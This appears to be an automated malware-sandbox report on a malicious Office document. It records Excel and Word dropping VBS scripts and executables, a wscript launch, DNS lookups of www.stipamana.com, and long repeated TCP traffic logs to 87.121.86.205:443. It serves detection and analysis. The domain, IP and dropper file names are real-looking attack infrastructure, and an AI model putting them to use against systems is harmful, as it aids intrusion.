                Source: Binary string: C:\Users\PROG-MAX\Desktop\TOPROTECT\Protected\server1_protected.pdb source: NXRWIG.exe, 00000008.00000000.517113620.0000000000152000.00000020.00000001.01000000.00000004.sdmp, NXRWIG.exe.5.dr, server1_protected[1].exe.5.dr

                Software Vulnerabilities

                barindex
                Document exploit detected (creates forbidden files)
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cfhxdfhgjsxgfhxz[1].vbsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\server1_protected[1].exeJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeJump to behavior
                Document exploit detected (drops PE files)
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: server1_protected[1].exe.5.drJump to dropped file
                Document exploit detected (process start blacklist hit)
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wscript.exe
                Source: global trafficDNS query: name: www.stipamana.com
                Source: global trafficDNS query: name: www.stipamana.com
                Source: global trafficDNS query: name: www.stipamana.com
                Source: global trafficDNS query: name: www.stipamana.com
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.205:443
